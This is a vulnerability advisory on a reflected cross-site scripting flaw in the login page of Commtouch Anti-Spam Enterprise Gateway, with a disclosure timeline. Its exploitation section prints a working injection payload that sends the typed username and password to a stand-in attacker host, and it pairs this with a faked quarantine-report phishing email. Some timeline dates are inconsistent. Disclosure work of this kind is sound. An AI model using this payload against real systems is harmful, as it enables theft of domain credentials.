Commtouch Anti-Spam Enterprise Gateway Cross Site Scripting (allowing
domain credential theft)

I. INTRODUCTION

Commtouch Anti-Spam Enterprise Gateway is an anti spam solution,
protecting enterprise networks for the ever increasing spam emails. The
anti spam solution includes a web application console which enables the
enterprise users to check the blocked messages, release messages, apply
blocking rules and more. 


For more Information please refer to:
www.commtouch.com <http://www.commtouch.com/> 



II. DESCRIPTION

A reflected XSS vulnerability was discovered by Erez Metula in the
product login page which enables an attacker to steal a victim's
credential to the corporate network. Since the login credentials are
usually the victim's credentials to the domain, it is a high risk
vulnerability which puts the whole domain passwords at risk.

 

Apart from being used as a regular reflected XSS attack vector, for
example by sending a malicious link to the user, there is another attack
vector that can be used which derives from the specific way the product
works.

The product sends a periodic email report to the user, listing the
emails that were identified as spam and were blocked. The user is given
an option to release / approve the mail, by clicking on the
corresponding link.

Clicking on the link brings the login page, in which the user enters his
domain credentials in order to access the web application and commit the
action.

In case an attacker sends a fake link pretending to come from the
product and containing the XSS link inside it, the user can be easily
enticed to supply his credentials in order to access the product console

 

 

III. EXPLOITATION



As explained above, exploitation can be achieved by traditional XSS
methods by utilizing the following pattern:

http://SERVER/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&
LoginType=1&PARAMS=XXX"><SCRIPT>PAYLOAD
</SCRIPT><input%20type="hidden"%20name="XXX"%20value="X

 

More interesting is a specific exploitation tied to the product
behavior, in which an attacker will fake the "My Quarantine Report"
coming from the product.

Steps:

1)      Setting up a credential stealing page at
http://ATTACKER.COM/stealer

2)      Building a fake "My Querentine Report" email with some enticing
"release me" email

3)      Replacing the content of the contained links inside the mail to

 

http://SERVER/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&
LoginType=1&DIRECTTO=3&PARAMS=XXX"><script>function SendCredentials(){
img = new Image(); img.src="http://ATTACKER.COM/stealer/?userid=" +
document.forms[0].LoginName.value + "&amp;password=" +
document.forms[0].LoginPass.value;} function HandleSubmit(){
document.forms[0].onsubmit= SendCredentials; } window.onload =
HandleSubmit;</script><input%20type="hidden"%20name="Params2"%20value="x

 

4)  send the fake email, pretending to be from the commtouch service

 

 

 
IV. IMPACT

Since the login credentials are usually the victim's credentials to the
domain, it is a high risk vulnerability which puts the whole domain
passwords at risk.



V. DETECTION

Detection of this vulnerability involves injecting some HTML tags /
scripts to the "PARAMS" parameter at the login page.


VI. WORKAROUND

Although originally reported for version V4 at 2006, the problem was not
solved even in version V5.

There is no official solution yet.

The only workaround possible is to blacklist HTML / SCRIPT tags, which
can be bypassed relatively easily and is not considered a very good
solution.

 


VII. VENDOR RESPONSE

Commtouch has been informed on the 7/12/06 by e-mail to their support.
Commtouch didn't not fix the problem by the time of publish.

 

 
VIII. DISCLOSURE TIMELINE



26/12/06          Identification of the flaw

27/12/06          Reporting the flaw to Commtouch by email

28/06/06          Response from Commtouch, asking for more description 

03/01/07          Providing the full description to Commtouch

22/01/07          Commtouch acknowledge of the vulnerability

22/01/07          Commtouch response for an unknown deliver time for a
patch

27/01/07          Commtouch was notified about full disclosure of this
information to the public

26/06/08          Release of this information, after no patch nor a fix
at the version V5 release


IX. CREDITS

The vulnerability was discovered by 


Erez Metula, CISSP    
Application Security Department Manager

Academic Director, 2BAcademy

Security Software Engineer
E-Mail:  erezmetula@2bsecure.co.il